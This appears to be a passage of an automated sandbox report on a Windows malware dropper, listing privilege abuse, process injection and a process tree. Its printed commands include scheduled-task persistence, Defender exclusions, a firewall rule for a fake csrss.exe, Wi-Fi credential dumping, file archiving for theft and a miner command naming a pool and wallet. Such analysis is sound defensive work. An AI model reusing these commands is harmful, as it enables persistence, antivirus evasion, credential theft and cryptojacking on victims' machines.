2924	4iBpiQUavIMb.exe
2924	4iBpiQUavIMb.exe
2924	4iBpiQUavIMb.exe
2924	4iBpiQUavIMb.exe
2924	4iBpiQUavIMb.exe
2924	4iBpiQUavIMb.exe
2416	Tat tow roc koyor manax wodebib haninew dolixo.exe
2416	Tat tow roc koyor manax wodebib haninew dolixo.exe
2416	Tat tow roc koyor manax wodebib haninew dolixo.exe
2416	Tat tow roc koyor manax wodebib haninew dolixo.exe
2416	Tat tow roc koyor manax wodebib haninew dolixo.exe
2416	Tat tow roc koyor manax wodebib haninew dolixo.exe
2416	Tat tow roc koyor manax wodebib haninew dolixo.exe
2416	Tat tow roc koyor manax wodebib haninew dolixo.exe
2416	Tat tow roc koyor manax wodebib haninew dolixo.exe
2416	Tat tow roc koyor manax wodebib haninew dolixo.exe

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

WerFault.exe

pid	Process
196	WerFault.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

4363463463464363463463463.exeAppLaunch.exebuild_2023-12-19_21-29.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	4748	4363463463464363463463463.exe
Token: SeDebugPrivilege	668	AppLaunch.exe
Token: SeDebugPrivilege	2232	build_2023-12-19_21-29.exe
Token: SeDebugPrivilege	3128	powershell.exe
Token: SeIncreaseQuotaPrivilege	3128	powershell.exe
Token: SeSecurityPrivilege	3128	powershell.exe
Token: SeTakeOwnershipPrivilege	3128	powershell.exe
Token: SeLoadDriverPrivilege	3128	powershell.exe
Token: SeSystemProfilePrivilege	3128	powershell.exe
Token: SeSystemtimePrivilege	3128	powershell.exe
Token: SeProfSingleProcessPrivilege	3128	powershell.exe
Token: SeIncBasePriorityPrivilege	3128	powershell.exe
Token: SeCreatePagefilePrivilege	3128	powershell.exe
Token: SeBackupPrivilege	3128	powershell.exe
Token: SeRestorePrivilege	3128	powershell.exe
Token: SeShutdownPrivilege	3128	powershell.exe
Token: SeDebugPrivilege	3128	powershell.exe
Token: SeSystemEnvironmentPrivilege	3128	powershell.exe
Token: SeRemoteShutdownPrivilege	3128	powershell.exe
Token: SeUndockPrivilege	3128	powershell.exe
Token: SeManageVolumePrivilege	3128	powershell.exe
Token: 33	3128	powershell.exe
Token: 34	3128	powershell.exe
Token: 35	3128	powershell.exe
Token: 36	3128	powershell.exe
Token: SeIncreaseQuotaPrivilege	3128	powershell.exe
Token: SeSecurityPrivilege	3128	powershell.exe
Token: SeTakeOwnershipPrivilege	3128	powershell.exe
Token: SeLoadDriverPrivilege	3128	powershell.exe
Token: SeSystemProfilePrivilege	3128	powershell.exe
Token: SeSystemtimePrivilege	3128	powershell.exe
Token: SeProfSingleProcessPrivilege	3128	powershell.exe
Token: SeIncBasePriorityPrivilege	3128	powershell.exe
Token: SeCreatePagefilePrivilege	3128	powershell.exe
Token: SeBackupPrivilege	3128	powershell.exe
Token: SeRestorePrivilege	3128	powershell.exe
Token: SeShutdownPrivilege	3128	powershell.exe
Token: SeDebugPrivilege	3128	powershell.exe
Token: SeSystemEnvironmentPrivilege	3128	powershell.exe
Token: SeRemoteShutdownPrivilege	3128	powershell.exe
Token: SeUndockPrivilege	3128	powershell.exe
Token: SeManageVolumePrivilege	3128	powershell.exe
Token: 33	3128	powershell.exe
Token: 34	3128	powershell.exe
Token: 35	3128	powershell.exe
Token: 36	3128	powershell.exe
Token: SeIncreaseQuotaPrivilege	3128	powershell.exe
Token: SeSecurityPrivilege	3128	powershell.exe
Token: SeTakeOwnershipPrivilege	3128	powershell.exe
Token: SeLoadDriverPrivilege	3128	powershell.exe
Token: SeSystemProfilePrivilege	3128	powershell.exe
Token: SeSystemtimePrivilege	3128	powershell.exe
Token: SeProfSingleProcessPrivilege	3128	powershell.exe
Token: SeIncBasePriorityPrivilege	3128	powershell.exe
Token: SeCreatePagefilePrivilege	3128	powershell.exe
Token: SeBackupPrivilege	3128	powershell.exe
Token: SeRestorePrivilege	3128	powershell.exe
Token: SeShutdownPrivilege	3128	powershell.exe
Token: SeDebugPrivilege	3128	powershell.exe
Token: SeSystemEnvironmentPrivilege	3128	powershell.exe
Token: SeRemoteShutdownPrivilege	3128	powershell.exe
Token: SeUndockPrivilege	3128	powershell.exe
Token: SeManageVolumePrivilege	3128	powershell.exe
Token: 33	3128	powershell.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

tuc7.tmptuc5.tmptuc4.tmp

pid	Process
2168	tuc7.tmp
784	tuc5.tmp
4268	tuc4.tmp

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

4363463463464363463463463.exetuc7.exetuc7.tmpnet.exehtml.exesetup294.execontrol.exe4iBpiQUavIMb.exe

description	pid	Process	procid_target
PID 4748 wrote to memory of 3652	4748	4363463463464363463463463.exe	75
PID 4748 wrote to memory of 3652	4748	4363463463464363463463463.exe	75
PID 4748 wrote to memory of 3652	4748	4363463463464363463463463.exe	75
PID 3652 wrote to memory of 2168	3652	tuc7.exe	76
PID 3652 wrote to memory of 2168	3652	tuc7.exe	76
PID 3652 wrote to memory of 2168	3652	tuc7.exe	76
PID 2168 wrote to memory of 4208	2168	tuc7.tmp	79
PID 2168 wrote to memory of 4208	2168	tuc7.tmp	79
PID 2168 wrote to memory of 4208	2168	tuc7.tmp	79
PID 2168 wrote to memory of 3160	2168	tuc7.tmp	77
PID 2168 wrote to memory of 3160	2168	tuc7.tmp	77
PID 2168 wrote to memory of 3160	2168	tuc7.tmp	77
PID 4208 wrote to memory of 4880	4208	net.exe	81
PID 4208 wrote to memory of 4880	4208	net.exe	81
PID 4208 wrote to memory of 4880	4208	net.exe	81
PID 2168 wrote to memory of 4984	2168	tuc7.tmp	80
PID 2168 wrote to memory of 4984	2168	tuc7.tmp	80
PID 2168 wrote to memory of 4984	2168	tuc7.tmp	80
PID 4748 wrote to memory of 2064	4748	4363463463464363463463463.exe	82
PID 4748 wrote to memory of 2064	4748	4363463463464363463463463.exe	82
PID 4748 wrote to memory of 2064	4748	4363463463464363463463463.exe	82
PID 2064 wrote to memory of 4676	2064	html.exe	182
PID 2064 wrote to memory of 4676	2064	html.exe	182
PID 2064 wrote to memory of 4676	2064	html.exe	182
PID 2064 wrote to memory of 3536	2064	html.exe	85
PID 2064 wrote to memory of 3536	2064	html.exe	85
PID 2064 wrote to memory of 3536	2064	html.exe	85
PID 2064 wrote to memory of 3536	2064	html.exe	85
PID 2064 wrote to memory of 3536	2064	html.exe	85
PID 2064 wrote to memory of 3536	2064	html.exe	85
PID 2064 wrote to memory of 3536	2064	html.exe	85
PID 2064 wrote to memory of 3536	2064	html.exe	85
PID 2064 wrote to memory of 3536	2064	html.exe	85
PID 2064 wrote to memory of 3536	2064	html.exe	85
PID 2064 wrote to memory of 3536	2064	html.exe	85
PID 2064 wrote to memory of 3536	2064	html.exe	85
PID 2064 wrote to memory of 3536	2064	html.exe	85
PID 2064 wrote to memory of 3536	2064	html.exe	85
PID 2064 wrote to memory of 3536	2064	html.exe	85
PID 2064 wrote to memory of 3536	2064	html.exe	85
PID 2064 wrote to memory of 3536	2064	html.exe	85
PID 4748 wrote to memory of 2924	4748	4363463463464363463463463.exe	86
PID 4748 wrote to memory of 2924	4748	4363463463464363463463463.exe	86
PID 4748 wrote to memory of 2924	4748	4363463463464363463463463.exe	86
PID 4748 wrote to memory of 4504	4748	4363463463464363463463463.exe	87
PID 4748 wrote to memory of 4504	4748	4363463463464363463463463.exe	87
PID 4748 wrote to memory of 4668	4748	4363463463464363463463463.exe	88
PID 4748 wrote to memory of 4668	4748	4363463463464363463463463.exe	88
PID 4748 wrote to memory of 4668	4748	4363463463464363463463463.exe	88
PID 4668 wrote to memory of 4756	4668	setup294.exe	90
PID 4668 wrote to memory of 4756	4668	setup294.exe	90
PID 4668 wrote to memory of 4756	4668	setup294.exe	90
PID 4756 wrote to memory of 2368	4756	control.exe	350
PID 4756 wrote to memory of 2368	4756	control.exe	350
PID 4756 wrote to memory of 2368	4756	control.exe	350
PID 2924 wrote to memory of 3404	2924	4iBpiQUavIMb.exe	92
PID 2924 wrote to memory of 3404	2924	4iBpiQUavIMb.exe	92
PID 2924 wrote to memory of 3404	2924	4iBpiQUavIMb.exe	92
PID 2924 wrote to memory of 2416	2924	4iBpiQUavIMb.exe	93
PID 2924 wrote to memory of 2416	2924	4iBpiQUavIMb.exe	93
PID 2924 wrote to memory of 2416	2924	4iBpiQUavIMb.exe	93
PID 2924 wrote to memory of 1896	2924	4iBpiQUavIMb.exe	95
PID 2924 wrote to memory of 1896	2924	4iBpiQUavIMb.exe	95
PID 2924 wrote to memory of 1896	2924	4iBpiQUavIMb.exe	95

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
1⤵
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4748
- C:\Users\Admin\AppData\Local\Temp\Files\tuc7.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\tuc7.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3652
- - C:\Users\Admin\AppData\Local\Temp\is-G79NO.tmp\tuc7.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-G79NO.tmp\tuc7.tmp" /SL5="$701E4,6521435,419840,C:\Users\Admin\AppData\Local\Temp\Files\tuc7.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in Program Files directory
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:2168
  - - C:\Program Files (x86)\DBViewerAPI\dbviewer.exe
      "C:\Program Files (x86)\DBViewerAPI\dbviewer.exe" -i
      4⤵
      Executes dropped EXE
      PID:3160
  - - C:\Windows\SysWOW64\net.exe
      "C:\Windows\system32\net.exe" helpmsg 25
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4208
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 helpmsg 25
        5⤵
        
        PID:4880
  - - C:\Program Files (x86)\DBViewerAPI\dbviewer.exe
      "C:\Program Files (x86)\DBViewerAPI\dbviewer.exe" -s
      4⤵
      Executes dropped EXE
      PID:4984
- C:\Users\Admin\AppData\Local\Temp\Files\html.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\html.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2064
- - C:\Program Files (x86)\Common Files\microsoft shared\ink\pipanel.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\html.exe"
    3⤵
    PID:4676
- - C:\Program Files (x86)\Common Files\microsoft shared\ink\pipanel.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\html.exe"
    3⤵
    PID:3536
- C:\Users\Admin\AppData\Local\Temp\Files\4iBpiQUavIMb.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\4iBpiQUavIMb.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2924
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /tn COMSurrogate /f /sc onlogon /rl highest /tr "C:\Users\Admin\Quase xab xewo jati hohoval palibega wocisec-yofoc joy somigowi verodedi mije\Tat tow roc koyor manax wodebib haninew dolixo.exe"
    3⤵
    - Creates scheduled task(s)
    PID:3404
- - C:\Users\Admin\Quase xab xewo jati hohoval palibega wocisec-yofoc joy somigowi verodedi mije\Tat tow roc koyor manax wodebib haninew dolixo.exe
    "C:\Users\Admin\Quase xab xewo jati hohoval palibega wocisec-yofoc joy somigowi verodedi mije\Tat tow roc koyor manax wodebib haninew dolixo.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    PID:2416
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"
      4⤵
      PID:4384
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"
      4⤵
      PID:2916
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\Files\4iBpiQUavIMb.exe"
    3⤵
    PID:1896
  - - C:\Windows\SysWOW64\chcp.com
      chcp 65001
      4⤵
      PID:4876
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1
      4⤵
      Runs ping.exe
      PID:2264
- C:\Users\Admin\AppData\Local\Temp\Files\UpdateCheck.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\UpdateCheck.exe"
  2⤵
  - Executes dropped EXE
  PID:4504
- C:\Users\Admin\AppData\Local\Temp\Files\setup294.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\setup294.exe"
  2⤵
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:4668
- - C:\Windows\SysWOW64\control.exe
    "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\R6h3R.CpL",
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4756
  - - C:\Windows\SysWOW64\rundll32.exe
      "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\R6h3R.CpL",
      4⤵
      PID:2368
    - - C:\Windows\system32\RunDll32.exe
        
        C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\R6h3R.CpL",
        5⤵
        
        PID:2224
      - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\R6h3R.CpL",
        6⤵
        
        PID:4456
- C:\Users\Admin\AppData\Local\Temp\Files\SynapseExploit.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\SynapseExploit.exe"
  2⤵
  PID:1552
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:2176
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:668
- C:\Users\Admin\AppData\Local\Temp\Files\cs_maltest.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\cs_maltest.exe"
  2⤵
  - Executes dropped EXE
  PID:2936
- C:\Users\Admin\AppData\Local\Temp\Files\build.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\build.exe"
  2⤵
  - Executes dropped EXE
  PID:2304
- C:\Users\Admin\AppData\Local\Temp\Files\tuc5.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\tuc5.exe"
  2⤵
  - Executes dropped EXE
  PID:3792
- - C:\Users\Admin\AppData\Local\Temp\is-MJ5JH.tmp\tuc5.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-MJ5JH.tmp\tuc5.tmp" /SL5="$20272,6525984,419840,C:\Users\Admin\AppData\Local\Temp\Files\tuc5.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in Program Files directory
    - Suspicious use of FindShellTrayWindow
    PID:784
- C:\Users\Admin\AppData\Local\Temp\Files\tuc4.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\tuc4.exe"
  2⤵
  - Executes dropped EXE
  PID:3116
- - C:\Users\Admin\AppData\Local\Temp\is-JFVJB.tmp\tuc4.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-JFVJB.tmp\tuc4.tmp" /SL5="$202F0,6525117,419840,C:\Users\Admin\AppData\Local\Temp\Files\tuc4.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in Program Files directory
    - Suspicious use of FindShellTrayWindow
    PID:4268
- C:\Users\Admin\AppData\Local\Temp\Files\build_2023-12-19_21-29.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\build_2023-12-19_21-29.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2232
- C:\Users\Admin\AppData\Local\Temp\Files\nxmr.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\nxmr.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  PID:4772
- C:\Users\Admin\AppData\Local\Temp\Files\Screensaver.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Screensaver.exe"
  2⤵
  - Executes dropped EXE
  PID:3772
- C:\Users\Admin\AppData\Local\Temp\Files\pinguin.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\pinguin.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  PID:208
- C:\Users\Admin\AppData\Roaming\wshom\liveupdate.exe
  C:\Users\Admin\AppData\Roaming\wshom\liveupdate.exe
  2⤵
  PID:196
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\SysWOW64\cmd.exe
    3⤵
    PID:2276
  - - C:\Windows\System32\certutil.exe
      C:\Windows\System32\certutil.exe
      4⤵
      PID:4852
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:632
- C:\Users\Admin\AppData\Local\Temp\Files\cp.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\cp.exe"
  2⤵
  - Executes dropped EXE
  PID:4876
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\s3rg.0.bat" "
    3⤵
    PID:5092
  - - C:\Windows\SysWOW64\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:1372
  - - C:\ProgramData\pinterests\XRJNZC.exe
      "C:\ProgramData\pinterests\XRJNZC.exe"
      4⤵
      Executes dropped EXE
      PID:5076
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 1 /RL HIGHEST /tn "XRJNZC" /tr C:\ProgramData\pinterests\XRJNZC.exe /f
        5⤵
        Creates scheduled task(s)
        
        PID:3068
- C:\Users\Admin\AppData\Local\Temp\Files\bc_memories_from_the_mcp.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\bc_memories_from_the_mcp.exe"
  2⤵
  - Executes dropped EXE
  PID:3560
- C:\Users\Admin\AppData\Local\Temp\Files\build3.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\build3.exe"
  2⤵
  PID:2176
- - C:\Users\Admin\AppData\Local\Temp\Files\build3.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\build3.exe"
    3⤵
    PID:3556
  - - C:\Windows\SysWOW64\schtasks.exe
      /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
      4⤵
      Creates scheduled task(s)
      PID:3820
- C:\Users\Admin\AppData\Local\Temp\Files\tuc3.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\tuc3.exe"
  2⤵
  PID:3884
- - C:\Users\Admin\AppData\Local\Temp\is-IL2UG.tmp\tuc3.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-IL2UG.tmp\tuc3.tmp" /SL5="$40268,6523803,419840,C:\Users\Admin\AppData\Local\Temp\Files\tuc3.exe"
    3⤵
    PID:540
- C:\Users\Admin\AppData\Local\Temp\Files\KarLocker_exe.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\KarLocker_exe.exe"
  2⤵
  PID:1008
- C:\Users\Admin\AppData\Local\Temp\Files\ama.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ama.exe"
  2⤵
  PID:2364
- - C:\Users\Admin\AppData\Local\Temp\4fdb51ccdc\Utsysc.exe
    "C:\Users\Admin\AppData\Local\Temp\4fdb51ccdc\Utsysc.exe"
    3⤵
    PID:400
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\Admin\AppData\Local\Temp\4fdb51ccdc\Utsysc.exe" /F
      4⤵
      Creates scheduled task(s)
      PID:516
  - - C:\Windows\SysWOW64\rundll32.exe
      "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\80c6bf70bf3f8f\cred64.dll, Main
      4⤵
      PID:1388
    - - C:\Windows\system32\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\80c6bf70bf3f8f\cred64.dll, Main
        5⤵
        
        PID:5100
      - C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        6⤵
        
        PID:932
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\934047325409_Desktop.zip' -CompressionLevel Optimal
        6⤵
        
        PID:3464
  - - C:\Windows\SysWOW64\rundll32.exe
      "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\80c6bf70bf3f8f\clip64.dll, Main
      4⤵
      PID:832
  - - C:\Users\Admin\AppData\Local\Temp\1000214001\cp.exe
      "C:\Users\Admin\AppData\Local\Temp\1000214001\cp.exe"
      4⤵
      PID:3152
  - - C:\Users\Admin\AppData\Local\Temp\1000215001\ma.exe
      "C:\Users\Admin\AppData\Local\Temp\1000215001\ma.exe"
      4⤵
      PID:2996
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpF624.tmp.bat""
        5⤵
        
        PID:396
      - C:\Windows\system32\timeout.exe
        
        timeout 3
        6⤵
        Delays execution with timeout.exe
        
        PID:3456
      - C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe
        
        "C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe"
        6⤵
        
        PID:2152
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ABSOLUTE" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe"
        7⤵
        
        PID:3104
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ABSOLUTE" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe"
        8⤵
        Creates scheduled task(s)
        
        PID:2428
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
        7⤵
        
        PID:5956
- C:\Users\Admin\AppData\Local\Temp\Files\xmrig.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\xmrig.exe"
  2⤵
  PID:4896
- C:\Users\Admin\AppData\Local\Temp\Files\aiitoo.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\aiitoo.exe"
  2⤵
  PID:2856
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2856 -s 672
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - Program crash
    - Suspicious behavior: MapViewOfSection
    PID:196
- C:\Users\Admin\AppData\Local\Temp\Files\tuc6.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\tuc6.exe"
  2⤵
  PID:1456
- - C:\Users\Admin\AppData\Local\Temp\is-7O8MN.tmp\tuc6.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-7O8MN.tmp\tuc6.tmp" /SL5="$40372,6522447,419840,C:\Users\Admin\AppData\Local\Temp\Files\tuc6.exe"
    3⤵
    PID:4624
- C:\Users\Admin\AppData\Local\Temp\Files\newrock.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\newrock.exe"
  2⤵
  PID:3488
- - C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
    "C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"
    3⤵
    PID:5368
  - - C:\Users\Admin\AppData\Local\Temp\Broom.exe
      C:\Users\Admin\AppData\Local\Temp\Broom.exe
      4⤵
      PID:1412
- - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
    "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
    3⤵
    PID:4172
  - - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
      "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
      4⤵
      PID:2508
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2508 -s 500
        5⤵
        Program crash
        
        PID:6088
- - C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
    "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
    3⤵
    PID:1352
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:5356
  - - C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
      "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
      4⤵
      PID:1472
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Loads dropped DLL
        
        PID:2368
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:5768
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:3156
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:5480
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:2908
    - - C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        5⤵
        
        PID:2428
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:6184
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        Creates scheduled task(s)
        
        PID:6256
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        6⤵
        
        PID:6912
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:6308
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:5616
      - C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        6⤵
        
        PID:5332
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        Creates scheduled task(s)
        
        PID:2452
- - C:\Users\Admin\AppData\Local\Temp\tuc3.exe
    "C:\Users\Admin\AppData\Local\Temp\tuc3.exe"
    3⤵
    PID:5404
  - - C:\Users\Admin\AppData\Local\Temp\is-N1I3S.tmp\tuc3.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-N1I3S.tmp\tuc3.tmp" /SL5="$103CC,8423542,54272,C:\Users\Admin\AppData\Local\Temp\tuc3.exe"
      4⤵
      PID:3820
- - C:\Users\Admin\AppData\Local\Temp\latestX.exe
    "C:\Users\Admin\AppData\Local\Temp\latestX.exe"
    3⤵
    PID:5156
- C:\Users\Admin\AppData\Local\Temp\Files\Archevod_XWorm.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Archevod_XWorm.exe"
  2⤵
  PID:992
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\Archevod_XWorm.exe'
    3⤵
    PID:5188
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Archevod_XWorm.exe'
    3⤵
    PID:4232
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
